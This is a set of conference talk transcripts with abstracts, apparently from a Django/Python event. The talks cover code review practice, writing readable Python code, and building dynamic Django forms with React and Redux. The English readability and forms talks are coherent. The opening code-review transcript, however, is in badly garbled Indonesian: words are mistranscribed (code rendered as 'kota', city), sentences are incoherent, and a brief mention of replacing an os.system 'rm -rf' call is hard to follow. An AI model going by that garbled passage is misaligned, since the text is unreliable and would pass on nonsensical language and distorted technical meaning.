berpengaruh tentang percayaan kayaan, Anda ingin memberi Anda untuk lebih banyak pengalaman, pasti telah memiliki proses perubahan, karena belajarannya sangat berharga. Saya harap kita tidak akan dihormati pada perubahan. Ini bukan hanya tentang menghormati, berkata, berpengaruh tentang kesilapan. Sebenarnya lebih banyak dari itu. Pada proses ini lebih seperti berpengaruh di teman-teman, di teman-teman, bukan tentang menghormati. Jadi, kita tahu, kita perlukan ini. Kita tahu kita perlu memiliki ini berpengaruh, kita ingin belajar. Kita juga tahu ini mungkin bisa menjadi negatif. Bagaimana kita buat ini positif, bagaimana kita buat ini lebih baik lagi? Kita mulai dengan memiliki empati. Saya tahu bahwa beberapa kita mungkin baik-baik, diteruskan, kita buat sesuatu yang salah, kita perlu memiliki hal yang salah, tapi tidak semua orang bisa menghormati, menggantikan hal-hal setiap hari. Memiliki komentar empat, komentar akan tergantung oleh semua orang. Sebelum mencari, melalui komentar, dan mencari konteks, apa yang ini mencari? Mencari titik, untuk mengelakkan salah faham. Seorang programer, mencari mencari mencari mencari kemahaman kecil. Memiliki komentar untuk mengelakkan kota. Biasanya ketika kita melakukannya, kita sangat cepat untuk menghormati kemahaman, untuk mengkritisasi. Tapi ketika komentar baik untuk memulai, tidak ada apa-apa yang perlu dikembangkan. Anda bahkan melihat hal-hal atau tidak. Selain itu, kita mengatakan hal-hal yang sedikit. Anda mengatakan tidak ada apa-apa. Anda mengatakan plus satu. Menurut para hal-hal yang sedikit, mengatakan terima kasih. Jangan mengambil ini untuk gramat. Saya tahu itu programer yang terbaik untuk menerima kota, tapi Anda masih bisa menunjukkan apalisi. Mungkin banyak projek memiliki kota yang berkontribusi. Saya rasa Anda juga harus memiliki kota yang diperlihatkan. Biar orang tahu apa yang dikembangkan dari proses ini. Jadi, apa yang harus dikembangkan ke dalam kota? Selain itu, kota yang dikawal, Anda harus membantu itu, tidak cukup seperti kota. Ini yang baik. Kota yang dikawal. Kita menggantikan kota yang terbaik untuk dikawal di kota dikawal. Anda tidak harus berhenti ketika Anda berhenti ke perusahaan, ke organisasi pribadi Anda. Anda harus memiliki kota dikawal Anda sendiri. Kami berpikir tentang apa yang Anda lakukan apabila ada masalah antara pemain pembinaan. Setiap pembinaan mungkin mengandalkan ini berbeda. Pemimpinkan timat. Anda mungkin ingin memiliki bahwa pembinaan dibuat dalam hari atau dua, tapi tidak lebih lama daripada itu. Sama juga, sebuah idea untuk memiliki pembinaan atau pembinaan alternatif, tidak memiliki pembinaan untuk hanya menjadi orang yang sama setiap masa, memiliki pembinaan. Mereka dapat memberikan kemampuan tambahan. Jadi, saya rasa kami tahu lebih banyak tentang proses pembinaan ini. Kita mulai dengan praktis. Jadi, ini adalah kota yang sebenarnya saya menemukan dalam kota legacy kita. Dan saya mengucapkan. Ada dua langkah yang mudah. Ini adalah sistem OS. RM.RF, dan beberapa file. Bagi saya, kita melihat bahwa ini tidak adalah standar yang berikutnya. Ada cara yang lebih baik untuk membuat pembinaan. Ini adalah cara yang lama. Format sebaiknya saya mengubah. Jadi sekarang, file ini bergegas. Tapi saya masih tidak mengerti apa yang ini. Saya membuat pertanyaan. Apa sistem OS? Ini adalah cara untuk memulai pembinaan dari Python. Jadi, semasa mencari, saya juga menemukan bahwa saya sepatutnya menggunakan pembinaan yang berbeda. Ini tidak dikunci. Bagus, saya belajar. Saya belajar perkara baru. Jadi saya mengubah. Jadi sekarang kita tahu apa yang ini berlaku. Ini adalah mengubah RM.RF. Kita coba menyerah file ini. Dan jika ada masalah dengan ini, kita tidak peduli. Saya tidak tahu. Saya tidak berkembang dengan ini. Apa yang ada seseorang lupa untuk menggunakan file ini? Ada cara yang lebih baik untuk mengubah file ini dari Python. Anda bisa membuat OS untuk mengubah. Sama bagian yang lain. Kenapa saya mengubah komentar yang dipercaya? Ada masalah? Saya ingin tahu. Saya ingin membuat penggunaan file ini. Jadi, ini berlaku sekarang. Saya lebih berkembang dengan ini daripada kelas sebelumnya. Jadi, kita bergerak. Kita bergerak sekarang. Terima kasih. Saya rasa kita ada masa untuk bertanya. Jika ada yang mau berjalan, saya akan bertanya. Saya ada pertanyaan. Apakah Anda membuat penggunaan file ini? Apakah Anda membuat penggunaan file ini? Atau Anda membuat penggunaan file internal? Karena itu sesuatu yang saya membuat penggunaan file ini. Ya, itu sangat berbeda. Kita mencoba menggunakan PAP8. Saya menggunakan PILINT. Saya juga menggunakan pilihan yang berhasil dengan Picharm. Tapi semua pembantu mempunyai pilihan sendiri. Saya mempunyai pilihan yang lebih suka menggunakan underscore. Saya mempunyai pilihan yang lebih suka pilihan kamu, jadi semua orang mempunyai pilihan sendiri. Itu sesuatu yang harus dibuat dengan pilihan sendiri. Saya mempunyai pertanyaan Anda, Aro? Saya sangat berterus menangis untuk membuat penggunaan file ini dengan penggunaan file internal. Apakah Anda mempunyai pilihan dengan pilihan Anda? Apakah mereka membuat penggunaan file ini? Saya rasa itu seperti penggunaan file. Saya membuat menggunakan pilihan sendiri. Kita membuat penggunaan file ini dengan kesehatan besar. Kadang-kadang, kita memiliki sesuatu yang digeritakan. Mereka tidak menyebutkan, mereka tidak menyebutkan, dan kami berakhir mempunyai orang yang memperkenalkan pilihan mereka. Mereka berkata, hey, kita memiliki pilihan ini. Terus mengikutnya. Saya memulai beberapa pilihan yang saya harus membuat untuk pilihan saya untuk pilihan mereka dengan mengawal mereka untuk mendapatkan perubahan pada pilihan mereka. Tapi saya menemukan banyak kali itu. Saya tidak yakin apa yang itu, tetapi pilihan saya tidak memperkenalkan banyak keberadaan. Saya melihat banyak, ya, memperkenalkan. Kadang-kadang, memperkenalkan sesuatu. Tapi ada apa-apa pilihan untuk, saya merasakan pilihan ini, saya rasa itu akan membantu. Tapi pilihan untuk memperkenalkan pilihan untuk memberi keberadaan dan mengambil kultur itu. Sebenarnya, karena Anda memberikan keberadaan, Anda tidak mengatakannya. Ini adalah peluang. Saya hanya memadai pilihan saya. Saya mengatakan dari saya. Saya tahu pada awal, saya mengatakan, oke, memperkenalkan kelas 1. Tapi ketika saya melihat keberadaan, itu penting. Jadi ketika saya melakukan pilihan, saya memperkenalkan lebih banyak. Saya mencoba membantu. Saya tahu keberadaan ini lebih baik. Kita membuat lebih banyak pesan. Tapi tidak semua pilihan mungkin memiliki kelas itu lebih banyak. Jadi itu sesuatu yang harus dipercaya. Anda memiliki untuk memperkenalkan masa pada hari yang mereka membuat karena banyak kali mereka hanya ingin membuat perjalanan mereka sendiri. Saya tidak ingin memperkenalkan masa dan periksaan lain. Saya memimpin ini untuk diri saya. Saya membuatnya pada hari yang terbaik. Pada pagi, sebelum makan, atau setelah makan sebelum saya hidup. Hanya memastikan sesuatu bisa dibuat. Dan saya memastikan bahwa Anda membutuhi bantuan mereka. Mereka juga membutuhi bantuan Anda. Dan ketika Anda menunjukkan contoh yang baik, orang akan memastikan ini adalah cara yang harusnya. Kita memiliki satu lagi pertanyaan. Saya ingat Anda memiliki berpikiran bagaimana mencari ini ke bawah ke tim yang kecil. Mereka adalah 3 pembelajar. Ya, apabila Anda memiliki 3 pembelajar dan Anda akan memperkenalkan banyak bantuan, saya juga memiliki satu tim yang kecil. Dan hanya sama orang-orang lagi dan lagi. Saya berusaha membuat ujian yang lebih kecil jika Anda bisa memiliki tim yang berbeda dalam pakaian yang sama. Oleh itu, mereka tidak terlalu terlalu banyak. Kalau ada yang telah diberi banyak bantuan, mereka harus meminta saya minta maaf untuk tidak melakukan review hari ini. Mungkin Anda ingin meminta seseorang lain untuk melakukan itu. Terima kasih.
|
Code review is like a buzzword in the programming world. Developers often talk about how important it is. But what really happens during code review? What do you achieve out of it? How can we learn during code review? This talk will present ideas of what should be the goals of a code review, and how can developers learn during code review process.
|
10.5446/32713 (DOI)
|
Come on, y'all! Hey, everyone. Let's talk about readability. So before we talk about readability, let's just kind of make sure that we're all on the same page. So textbook definition, readability is really just the measure of how easily we can read our code. So I'm assuming you're all here because you care about readability, but why do we actually care about readability? What makes it actually important? So every time you fix a bug, change some functionality, or add a new feature to your code, you probably need to read some code. So you probably read code more often than you write it. Also, you do sometimes need to change code. Code doesn't always stagnate immediately after you write it. In order to change something, you need to read it. So readability is really a prerequisite for maintainability. You can't have maintainable code unless you have a readable code. Lastly, not all teams are immortal. You do sometimes need to hire developers, and those developers will need to be onboarded into your team. It's a lot easier to onboard people when they can read your code. So before we get started, let's make it clear what we're not going to talk about. We're not going to talk about how easy it is to write code. We're not going to talk about how easy it is for the computer to read your code and to run your code. We're only talking about how easy it is for humans to read your code. So we'll talk about how to structure your code, which pretty much boils down to where you put your line breaks. We'll also talk about naming unnamed things and also naming things more descriptively. And finally, we'll reconsider some of the programming idioms that we use every day. We'll be looking at a lot of small code examples. So if you can't keep up, don't worry. I'm going to tweet out the code afterwards. There's a lot going on. All right. So let's talk about the structure of our code first. In the modern age, line length is not a technical limitation anymore. Screens are really wide. Line length is not about punch cards. It's about how readable your code is. Long lines are not easy to read. Line length is a little flawed, though, because when it comes to readability, indentation isn't quite the same as code. So instead of focusing on line length, I propose that we focus on text width. This is basically line length where we ignore the indentation. Now, I don't know what a good average text width is. I prefer kind of a 60-character maximum, but really most importantly, we should focus on making our code readable when it comes to text width and not worrying about some arbitrary limit. Short lines are not our end goal. Readability is our end goal. All right. Let's talk about line breaks. So this code has a text width under 60 characters. As you read this code, you're probably trying to figure out what it does. You're not going to figure out what it does until you've figured out what the structure of this code actually is. You'll eventually notice that that first statement there has a generator expression with two loops in it, and that second statement has a generator expression with one loop and a condition in it. This code is hard to read because the line breaks were inserted completely arbitrarily. The author simply wraps their lines whenever they got near some maximum text width or line length. The author was valuing text width or line length as the most important thing. They completely forgot about readability. Is this code more readable? This is the same code as before, but the line breaks have been moved around to split up the code into logical parts. So these line breaks were not inserted arbitrarily at all. These were inserted with the express goal of readability. All right. Let's take a look at another example. Let's say you're creating a Django model and one of your model fields has a whole bunch of arguments passed into it. So we're passing a lot of arguments into this foreign key field here, and it's feeling a little unwieldy. Is this a good way to wrap our code over multiple lines? What about this way? Is this better or is this worse? What about this one? How does this compare? Would anything change if we were using exclusively keyword arguments here? Would that affect our choice at all? So personally, I usually prefer that last strategy for wrapping my lines, especially with all keyword arguments. I almost always prefer that last one. The first one's a little difficult to read, and that second one can be kind of problematic when you have really long lines like we do here. All right. So let's take a look at that last strategy a little more closely. Would it be better to leave off the closing parenthesis or rather to put that closing parenthesis on its own line? Okay. Got a lot of nods here. What if we added a trailing comma? Would this be an improvement or is this worse? Better. Okay. All right. So personally, I also prefer this last one here. Now, I am certain that there are some of you in this room who are not nodding your heads who disagree with this preference of mine. That fact is okay. The fact that we disagree means that we need to document the way that we're wrapping our function calls in our style guide for every project we make. You do have a style guide for every project you make, right? Your style guide doesn't just mention PEP 8. I'm going to dramatically drink some water here as you think about this. All right. So consistency lies at the heart of readability. You need to make sure that you are defining a style guide with really explicit conventions in every single Django project that you make. Do poets use a maximum line length to wrap their lines? No. Poets break up their line breaks with purpose. In poetry, inserting a line break is an art form. In code, inserting a line break is an art form. So as programmers, we should wrap our lines with great care. And remember, all your projects should have a style guide that goes well beyond PEP 8. Your code style convention should be explicitly documented. All right. Let's talk about naming things. If a concept is important, it needs a name. Names give you something to communicate about. Unfortunately, naming things is hard. Naming a thing requires that you describe it. And describing a thing isn't always easy. Not only that, once you've described a thing, you need to shorten that description into a name. And that's not always easy either. If you can't think of a good short name, use a long and descriptive one. That's a lot better than a subpar name that's really short. You can always shorten a name tomorrow. It's hard to make a name a little bit longer. So worry about accuracy, not the length of your names. Okay. Let's take a look at some code with some poor variable names. I bet that you do not know what SC stands for in this code. Anyone want to guess? It does not stand for South Carolina. So you might know if you had more context that this stands for state capitals. Don't use two letter variable names in Python code. Use descriptive names. Now, speaking of descriptive names, what does the I variable here represent? Index, okay. Is it a two tuple? Maybe something else? Is I subzero capitals or is it states? Or something else entirely? So when you see an index access, this should be a red flag. Index accesses can usually be replaced by variables. We can do this with tuple unpacking. So you can probably tell now that S and C means state and capital. Or maybe you could guess that. Avoid using arbitrary indexes in your code. Whenever possible, use tuple unpacking instead. It's often a lot more explicit to have named variables than it is to have indexes in your code. Now, you probably did guess that S and C means state and capital, or maybe you know because I told you. But there's no reason not to use real words here instead. This makes our code a lot easier to read and it wasn't that hard to type. Name every variable with care. Optimize for maximum accuracy and optimize for maximum completeness. Make sure you're describing everything as fully as you can. Okay. Let's take a look at an example of code that could use some more variable names. This code returns a list of all anagrams of words that are in the candidates list. It's not bad code, but it's also not the most descriptive code. The if statement in particular is pretty loaded. There's a lot going on there. What if we abstracted out that logic into its own function? So with this is anagram function here, I think it's a lot more obvious that we're checking whether two words are in fact anagrams. We've broken down the problem and described the process that we're using and left out the details. The details are inside that function. Let's take a look at that function. So this is pretty much exactly what we had inside our if statement before. It could use a little bit of work. Firstly, word1.upper, word2.upper, those both appear twice. We've got some code duplication there. Let's fix that. Okay. That's a lot better. I certainly find that conditional on that last line easier to read, but I think there's still more room for improvement. So one strategy that we could employ here is to read our code aloud. So I like to read my code aloud to see how descriptive it is. Here we're sorting our words, checking whether sorted versions are equal, and then checking whether the unsorted versions are, sorry, checking whether the words are not in fact the same word. Now, that description took me a little bit to read because it's not the easiest thing to figure out. That description isn't very helpful. It's not very much like how we describe this in English. We add some comments to describe this in actual English. We can see that we're actually checking whether the words have the same letters and whether they're not the same words. Now, this code is form out a little bit strangely, but it is more descriptive. We've added comments to describe what's actually going on. Whenever you add comments, though, that might be a hint that you actually need another variable name or a better variable name. In this case, we need some more variable names. So here we've turned those conditional statements into two new variables that describe what they actually do. Our different letters and have same words describes exactly what we're doing. That last line literally says, return, have same letters, and our different words. We've broken down this problem to make it more clear and more readable because we're conveying the intent of our algorithm, not just the details. Okay, so we ended up adding four extra lines to that code, but we broke down our process a bit in doing so. It's a little bit more understandable at first glance. You may think this example is silly. I mean, what we started with wasn't really that complex, but this process was a worthwhile mental exercise regardless, even if we're going to end up reverting this code afterwards. The exercise of refactoring your code to be more self-documenting is almost always a worthwhile endeavor. It helps you reframe the way that you actually think about your code. Okay, let's take a look at a complex Django model method. I'm going to go through this one a little bit quickly, and there's a lot of code here. I don't want you to read this code. I'd like you to unfocus your eyes and focus on just the shape of this code. There, did you do it? Okay, so the first thing you'll notice is that this code is broken up into three sections. There's three sections because there are three logical parts to this code. If we had comments to each of those sections, we can better see what's actually going on. Now, remember I said comments are maybe a step in the direction of making variables that don't exist or making variables with better names. We're missing variables here. We could name these sections by making methods for them. So even when you see the code here, you're tempted to read the comment because the comment's what's actually saying what's going on. Now, one step, make methods for these. If we split these out into helper functions, those names actually describe what the code is doing. I left in the doc strings because, you know, there's no reason not to leave in documentation. Documentation is not quite the same as comments. It's always good to document your things. If we call those methods in our original function, this now describes the actual process. This is almost like English here. If we wanted to see what each of these is doing, we can jump into that function. We don't have to be distracted by the fact that it's doing some really detailed stuff under the hood. Okay, so brief recap. Read your code aloud to ensure that you're describing the intent of your algorithm in detail. Remember that comments are great for describing things, but sometimes a comment is just the first step toward a better variable name or a variable name that didn't exist before. Also, make sure you're giving a name to everything. And in general, describe for descriptive and self-documenting code. Okay, so this section's a little long. I may end up skipping over one or two of these little subsections here. Basically, let's talk about the code constructs that we actually use and make sure that our code constructs are as specific as they should be. When given the opportunity, I prefer to use a more special purpose tool than a more general purpose tool if it makes sense. Specific problems call for specific solutions. So let's take a look at exception handling. Here we're opening a database connection, reading from it, and closing the connection. We need to make sure that we're closing the connection every time that we exit this code, even if an exception occurs. So we have this try finally block here. Now, whenever you see any code that has kind of a cleanup step, think about whether or not you could use a context manager. It's not that hard to actually write your own context managers. You just need a DunderInter and a DunderExit method. By the way, Dunder stands for double underscore for anyone who's not familiar with that nomenclature. Let's look at how this context manager is actually used. Okay, so this is a little bit more clear than what we had before in the sense that we're not distracted by the fact that we have to close our database connection when we're done with it every time. The code does that work for us. Now, we just implemented our own context manager, but the standard library already had one we could have used in context lib called closing. You don't always have to implement your own context managers, but you can if you want to, and it's not that hard. So whenever you have a cleanup step, think of a context manager. Okay, let's talk about for loops. This code loops over something. You can tell that even though it's blurred out. This code actually does a little bit of something more, though. Specifically, the purpose of this code is to loop over something, check a condition, and create a new list from every item that passes that condition. So we're using a list append and if statement and a for loop to accomplish this task. There's a better way to write this code, though. Here we are accomplishing the same task, but instead of using a for loop and if statement and a append call, we're using a list comprehension. We've removed a lot of the unnecessary information that our brains would have to process otherwise. At a glance, we can see that this code is not just looping, it's creating one list from another list. That's a better description of what our code actually does. When you have a specific problem, use a specific tool. Okay, I'm going to skip this one. You can look at the slides afterwards. Well, we'll go over it very briefly. So essentially, if you have something that has methods that look like this, contains, set, add, remove, is empty, this is very similar to what Python objects actually do under the hood. What a container does of any variety, what a list does, what a dictionary does, think about whether or not you should be making your own version of those containers. You can do that with abstract base classes in the standard library or you can roll it yourself using Dunder methods. Let's talk about functions. This code connects to an IMAP server and reads email. Notice that one of these functions returns a server object and the other three functions accept a server object. It should be a hint that something weird is going on here. If you ever find that you're passing the same data to multiple functions, think about making a class. This is exactly what classes were designed for. I know there's a big pushback against making classes, an object-oriented programming in general, but classes bundle functionality and data together. Whenever you're doing that in your code, it's appropriate to use them. Let's do a recap. When you find yourself wrapping code in redundant tri-finallys or tri-accept blocks and whenever you have a clean-up step in general, think about using a context manager. Also when you're making one list from another list, there's an idiom for that. It's called a list comprehension. It might be a little bit more clear to use than using a for loop. When one object looks like a container but isn't a container, it probably should be a container. You can turn it into a container by using Dunder methods. Don't be afraid to use those Dunder methods either regardless of whether it's for context manager, a container, or anything else. Dunder methods are your friend. I'm not calling the magic methods because they are not magical. If you have a specific problem, use a specific solution. When you're writing code, stop to pause every once in a while and actively consider the readability of your code. You can use this checklist as a starting point for your own reflections on your own code's readability. As you use this checklist on your code, start to build up that code style guide that we talked about earlier that I know you all have but want to improve. Remember that every project does need a detailed code style guide. The more decisions you can offload to the style guide, the more brain power you'll have left over to spend on more interesting and less trivial things. Finally, here's a list of videos I recommend watching when you get home. Some of which contradicts some of the things I said, some of which support them. Do we have time for questions? We do. We have time for two short questions. Hi, Trey. Great talk. I often forget myself as a Pythonista when I can break up a list comprehension. Are there rules? Does Python care? What are the rules if I'm trying to follow your example and break up a list comprehension to replace a for if statement? Can you create a list comprehension out of a for loop? I'm used to writing it as one big long thing. Does Python care where I split it into multiple lines? Right. So as long as you are inside parentheses, square brackets or curly braces in Python, Python allows you to break that up wherever you want. In fact, you can even indent your code in really weird ways just to make people unhappy. Don't do that. Implicit line wrapping is a really easy thing in Python. So you can break it up wherever. I would recommend breaking it up before the for clause and before the if, basically before the logical components. Cool. Thank you. Thanks, Trey. Good talk. Do you have a suggestion for a good styling guide that's out there that you recommend to look at to then adopt our answer? Did it look at to what? To other good style guides out there that we can adopt to and adjust to our own personal needs? No. This is kind of one of those do as I say, not as I do situations. None of my open source projects have a style guide. So, you're welcome. All right. Well, with that, let's get ready for the next session coming up in five minutes. Thanks, Trey. Thank you. Thanks.
|
Most code is read many more times than it is written. Constructing readable code is important, but that doesn't mean it's easy. If you've ever found unreadable PEP8-compliant code and wondered how to fix it, this talk is for you. Long-lived code must be maintainable and readability is a prerequisite of maintainability. It's easier to identify unreadable code than it is to create readable code. Let's talk about how to shape tricky code into something more readable and more maintainable. During this talk we'll discuss: whitespace self-documenting code modularity expectation management We'll conclude this talk with a checklist of questions you can use to make your own code more readable.
|
10.5446/32716 (DOI)
|
Come on, Noah! MUSIC Uh, so before I get started, just to raise hands, how many people have heard of or worked with Krispy Forms? Okay, so there's a lot of people. Um, I want to, like, see how many people are going to be upset at me if I, like, say things about Krispy Forms before I get started. So, uh, quick, just to introduce myself, I'm Kurt Gittins. Like you said, I'm a software engineer at Dealer Track. Um, and at Dealer Track, we work a lot with Jingo Forms. Um, we have a lot of situations where we need a really complicated data entry, um, a lot of dynamic validations and dynamic forms. I'll kind of get into what I mean by dynamic forms. Um, but this talk comes from a lot of what we've been building at Dealer Track and what we've learned in terms of how to kind of use Jingo Forms to extend its capabilities to be dynamic. Um, but before I go into the problems that we actually solved, I want to kind of back up and talk about what Jingo Forms actually is. And, uh, this is kind of parallel to what's in the Jingo documentation. Um, but basically, like, Jingo Forms offers you abstractions over three kind of core things, right? So you get an abstraction over the structuring of a form, which tells you, like, what fields are going to be on the form when you write your form class. Uh, you define these class level variables that are objects that are your fields. So the structure of your form is basically that, like, what fields are going to be on the form. Um, then there's the rendering of a form, which is, like, Jingo takes care of actually creating the HTML elements that your users need to actually put data into. Um, and so Jingo takes care of that for you. There's a template tag. All you need to do is use the form tag, um, and it renders the form. So Jingo Forms gives you functionality for that. And the last part is validating and processing the data. And, um, that is where you define a set of rules for when the data that the user enters is going to be accepted. So, um, you have your, the basic Jingo validations that you get from, like, validators, that these are things that Jingo adds. Like, when you create, like, an integer or fields that capture, like, numeric data and you set a max and min value, um, you have those kind of validations and then you have more complicated validations that you can write in your form clean or your individual field clean. So these are kind of the three main things that Jingo gives you. And so, at a lot of the situations that we're having at DealerTrack, we needed to create dynamic, uh, we needed to basically make all three of these things dynamic. Um, and so, starting with structuring, um, what I mean by creating a dynamic form structure is that we needed, we had a situation where we needed a form where the fields on it might change depending on certain pieces of user context. And this is, like, probably a problem that multiple, it's not just unique to us, right? A lot of people might have to deal with something like this. Um, so, like, the reason why you might need to do something like this is, like, say you have a really basic form that captures some data, but, um, then you need to introduce a piece of context to change the form, right? So you can do that like this, right? You can add an if condition, uh, that adds a field to the form, right? SelfDotFields is a dictionary. You can put a field into it dynamically when you instantiate the form, and everything works. The problem with this is that, uh, hold on. That's, yeah, that's the right side. So the problem with this is it doesn't scale when you have a lot of conditions. So when you start getting really complicated layouts that have a ton of conditions and a ton of fields that need to change, this solution doesn't work too well because you'll have a really messy form in it that, like, has a ton of if conditions and a bunch of custom business logic. And what you want to do is separate the two of those things, right? You want to be able to separate your logic that determines what you see as part of the form structure from those rules. Um, and so the way that we chose to solve this problem is by treating our fields as data. And what that means is, like, uh, the way that you define forms, uh, or fields with Jango right now is you use, like, it's an object, right? Um, and you set some quarks on an object when you instantiate it, and that determines what, uh, Jango renders and how Jango validates it. But all that information, um, you could basically represent as a dictionary, right? Instead of an object. And working at it, working with it as a dictionary makes it a lot easier to kind of, uh, move the layouts around. Uh, your data becomes a lot more malleable. So, um, you, we start off with a solution that looks something like this, right? So your fields now become, like, entries in an order dictionary. And your field structure is no longer directly tied to the form. Instead of having a class definition that says, here's the fields, here's the order, you have this, which basically takes in your field structure object, um, which is, you know, basically the same as what self.fields ultimately builds. But what you get now is you have a layout that's separate. So, if you want to have a different layout, you define a different variable, um, with a new order dictionary. Um, and you can actually take this a step further and move the actual field objects out of it, or rather these field variables with the data, um, and kind of replace them with, uh, the way this solution works is so you now, instead of having a order dictionary that contains the actual names, you create a list of strings and you grab those names from some sort of module. Uh, in this, uh, example, I'm using a class, but you could swap that out for anything, right? So, you have, uh, a list now that defines your field layout, and it's completely separate from your Django form. So what you can do, and what we actually do with DealerTrack is, we have an API call that determines what fields are on the form at runtime. So our API takes care of the context and, you know, all of the specific business rules that determine what fields need to be on the form, and then it spits out just a list of strings. And this knows what to do after it has that list of strings, right? Um, it does a get attribute on the class that contains the field. Uh, so we have this kind of class that, or, that will contain all the possible fields that could be on the form, uh, since you need to have a super set, you need those fields definitions somewhere. Um, so we grab an attribute from that class. Uh, we basically, like, instantiate the actual Django field object, whether it's a character field or, you know, um, like an integer field or something like that. And then we just stick it into self.fields, because we can add entries to that really simply. So, um, that's all you need to do to have a dynamic field layout. Um, but the other piece of it is actually rendering this. So, we need to get HTML from this dynamic field layout. So, we know about the Django form tag, right? Um, you just place it into your template, and it renders all the fields on your form for you. Uh, one of the problems with this, though, is if you need to have any custom HTML or CSS, instead of what Django generates for you, um, it becomes difficult because you're not exactly sure what elements are going to be on the page. Uh, so for a while, we had a solution that worked with Django, which is called the Django crispy forms. Um, but I think for stuff like this, it's probably, I would advise staying away from Django crispy forms, because it forces you to tie your particular form to a particular layout. Um, so, crispy forms gives you abstractions over, like, uh, the actual HTML elements that you'll see on the page. Um, but if you have a dynamic layout, you don't really want to tie it up directly to your form definition, right? You could use that layout in multiple forms, um, and you don't want to, you know, be tied to one particular rendering of that. So, uh, that's kind of how the dynamic field structure problem works. So, one of the other problems that we had to solve was dynamic form validation. Um, kind of an example of why you would want to do this, uh, kind of a really trivial one is, like, if you have an address field in your application, um, you might want to call it to a third-party service to validate that your address is actually correct, right? Um, but the problem is that third-party service has errors, your Jango form has errors, and you want the two of those to really act as one. Um, because it's just interesting to talk about, our actual use case, uh, at DealerTrack was that we have, uh, third-party users who write validations in a language that we've created that influence our Jango form. So, and then those validations that they write are evaluated by a microservice that we have. Um, and that all, that aspect of it is actually pretty complicated, but Jango allows us to kind of not worry about dealing with those errors that once we actually get them back from the API. So, all you need to really do to integrate external errors that you get from another service with the internal errors of your form is just call add error. So, uh, like, I wouldn't actually call clean, or call an API directly in clean like this, but basically the approach is kind of the same, right? You make a call out to an API, um, you map up the errors that you get back from the API with the, uh, the fields that you have in your form, and then you just call add error, and Jango takes care of the rest. So, what's good about this is like, if you have an existing infrastructure for displaying errors to the user, like I'm sure a lot of web applications do, right, you need your user to see in a lot of cases what's wrong on the form, this allows you to integrate those external errors as if they came from Jango, and you don't have to worry about doing any of the extra work. So, you just add error, it takes a field and an error message, and it displays it on that particular field, and, or, it adds it to the field in the Jango form, and then however your display works, uh, it's going to continue to work the same way. So, one last problem that we looked at at DealerTrack was having user-driven fields, and basically what I mean by this is like, um, you give the user ability to add like a field to your Jango form, so, um, kind of to look at an example of this, right, uh, like, okay, so this is in the middle of the animation, but basically this demonstrates like say you have a list of potential optional inputs that you want the user to be able to add, um, the user can select one and add it to your Jango form. So, there might, it seems like at first there might be a lot of problems like we think of Jango forms as like you have a static definition of the form, but you can actually handle this completely with our previous solution. Uh, obviously you need a little bit of JavaScript to kind of make sure that this works the way that it is supposed to work, um, but there's basically like three really simple pieces to the solution. So, on the UI aspect, actually rendering the fields is taken care of by JavaScript, so, um, which might seem a little strange because you'll have initially a mismatch between what's, the user actually is seeing and data entering, um, and what is actually on your Jango form when you render it, but you allow JavaScript to, um, basically implement the functionality to allow the user to add the fields to the form, and then when you save your dynamic field structure part that we talked about before comes into play, because now you can change, you can add those additional fields that the user added to the form. So, the JavaScript part is, uh, not that complicated. It looks kind of like, this is like a really trivial implementation of it, um, and basically the key part is that you need to pass data from your template context in, uh, when you're rendering the Jango template to JavaScript. So, like here I have, um, the drop-down contents, which is like a list of all the potential fields I want to allow the user to add, and then save drop-down fields as a dictionary of the field. Um, if the user has saved data for it already, and the value that the user has saved for it, uh, the reason why I need both of those things is because, like, I don't want to wipe out, or I don't want the user to lose any data, right? So, if they save something, when they reload the form, JavaScript needs to create the fields that they've already saved. So, all this does is it loops through the drop-down contents, and if the user saved data for it, it creates, like, a static field that looks like everything else. If the user hasn't, it adds it to the drop-down, and then, um, what actually drives a drop-down is just, like, a really simple JavaScript that checks for a change and adds a field in the same way that this might. Um, the Jango form side of it is even simpler because we have our base fields, which are what you see when you render the form, and then you have the drop-down fields, um, and now when you're saving, you can just add the drop-down fields into your field structure, uh, because you can change it at any point. You can have a different, you can load with a different form than you saved with, and now your validations work, even though those fields weren't in your form when the user loaded the page. Uh, so, one last thing I kind of want to talk about a little bit is, um, so a lot of these problems ended up leading us to the decision to move away from, uh, the architecture that we currently had, which was Jango forms and just regular HTML Jango templates, and we moved to, um, React.js Redux. And so, but the actual back-end is pretty much the exact same in React.js and Redux. You still have, we still use our dynamic field structure, and that actually helps us more when we move to React.js, because what happens is, um, we implement React components that mirror the Jango fields, and then what happens is you send your whole field structure, instead of letting Jango render it, you can dump it as a JSON and treat it as data once again and send it to the front-end and let React render it, and then React takes, kind of treats it, you can treat your forms then, um, as like pages in your single-page application, uh, or, yeah, single-page application framework with React, and then what we use Redux for is to kind of, um, imitate the sort of like state storage and save that you would get with like doing regular post requests. So Redux is just, um, like a plug-in that you can use that allows you to store state. React just handles the actual rendering. So Jangoform spits out a field structure, the same thing that we had before. React renders it, um, because you have the same React components that mirror the Jango fields, and then Redux just takes care of making sure that the data that the user enters is saved, and then, um, when the user, you know, wants to post back to the form, they can do that via Ajax. Uh, so that's really it. Um, any questions? I think I have some time for questions and answer, so... So, you got in the last part about using, start using React and Redux. Yeah. How do you handle the server side validation? Right. You usually get messages from the backend. How do you present those into the React UI? So, the way that this actually works is we're kind of, and this is like kind of, this solution is not in the best stages that it currently could be, but, um, our backend, uh, basically instantiates a Jangoform that, because we have that field structure which represents a Jangoform, so the backend instantiates a Jangoform with the data that it gets via Ajax from React, um, we get form errors back, and then we just send those form errors back as JSON to React.js, and then React renders it the same way that we would before. Does that answer your question? Yeah. Thanks. Uh, do you want to go? I don't know. Thanks for the talk. That was really interesting. In fact, I work with a Jango-based CMS, uh, called Wagtail. That's very similar, uh, in the way that it's handling its own forms in Sadmin. Do you, uh, have any use cases where you have, like, saved the state of the form at the time that it rendered? Because if the form is just data, then you could save that JSON string of, of that dictionary, and then access that form in the exact state as it was during that time, and then you kind of have this sort of Jango, like, the migration state, uh, type thing with your forms. So, um, with Redux, that actually kind of is what you get. So, Redux tracks the state of the form. So, as soon as you render the page, GetInitial populates the field values, and then that also populates Redux's state. So, at that point, you have a state that basically represents all of the data that you have on the page, and, um, that state stays updated. So, if the user changes something on the UI element, it updates in the Redux state, and then that's kind of how we don't do anything else to, like, capture the post data. Redux just stays updated with the state, and then when you save, or, you know, when you post back to the server via Ajax, um, it's the same state, and whatever the user updated gets updated when you send it back. Thanks. Um, so I really love the idea of, uh, sending the form structure to React as Jason, and having React components that mirror the Django form structure. So my question is just, um, do you, are your React components for forms open source, or do you know of any available, uh, projects that have, uh, fields that mirror the Django form structure? That is a good question, 